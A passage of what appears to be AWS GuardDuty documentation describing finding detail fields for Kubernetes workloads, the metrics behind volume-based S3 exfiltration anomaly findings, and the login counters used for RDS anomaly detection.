  - Permission – The Kubernetes verb and resource being checked for access, to indicate whether or not username can use the Kubernetes API.
  - Service Account Name – The service account associated with the Kubernetes workload that provides an identity to the workload.
  - Registry – The container registry associated with the container image that is deployed in the Kubernetes workload.
  - Image – The container image, without the associated tags and digest, that is deployed in the Kubernetes workload.
  - Image Prefix Config – The image prefix with the container and workload security configuration enabled, such as hostNetwork or privileged, for the container using the image.
  - Subject Name – The subjects, such as a user, group, or serviceAccountName, that are bound to a reference role in a RoleBinding or ClusterRoleBinding.
  - Role Name – The name of the role that is involved in creation or modification of roles or the roleBinding API.
S3 volume-based anomalies
This section details the contextual information for S3 volume-based anomalies. The volume-based finding type (Exfiltration:S3/AnomalousBehavior) monitors for unusual numbers of S3 API calls made to S3 buckets by users, indicating potential data exfiltration. The following S3 API calls are monitored for volume-based anomaly detection.
- GetObject
- CopyObject.Read
- SelectObjectContent
The following metrics build the baseline of usual behavior when an IAM entity accesses an S3 bucket. To detect data exfiltration, the volume-based anomaly detection finding evaluates all activity against this baseline. Choose Historical behavior in the Unusual behavior (User Identity), Observed Volume (User Identity), and Observed Volume (Bucket) sections to view the following metrics, respectively.
- Number of s3-api-name API calls invoked by the IAM user or IAM role (whichever issued the calls) against the affected S3 bucket over the past 24 hours.
- Number of s3-api-name API calls invoked by the IAM user or IAM role (whichever issued the calls) against all S3 buckets over the past 24 hours.
- Number of s3-api-name API calls across all IAM users and IAM roles against the affected S3 bucket over the past 24 hours.
RDS login activity-based anomalies
This section details the count of login attempts performed by the unusual actor, grouped by the result of the login attempts. The RDS Protection finding types identify anomalous behavior by monitoring the login events for unusual patterns of successfulLoginCount, failedLoginCount, and incompleteConnectionCount.
- successfulLoginCount – This counter represents the sum of successful connections (correct combination of login attributes) made to the database instance by the unusual actor. Login attributes include user name, password, and database name.
- failedLoginCount – This counter represents the sum of failed (unsuccessful) login attempts made to establish a connection to the database instance. This indicates that one or more attributes of the login combination, such as user name, password, or database name, were incorrect.
- incompleteConnectionCount – This counter represents the number of connection attempts that can't be classified as successful or failed. These connections are closed before the database provides a response. Examples are port scanning, where the database port is connected to but no data is sent to the database, or a connection that was aborted before the login completed as a successful or failed attempt.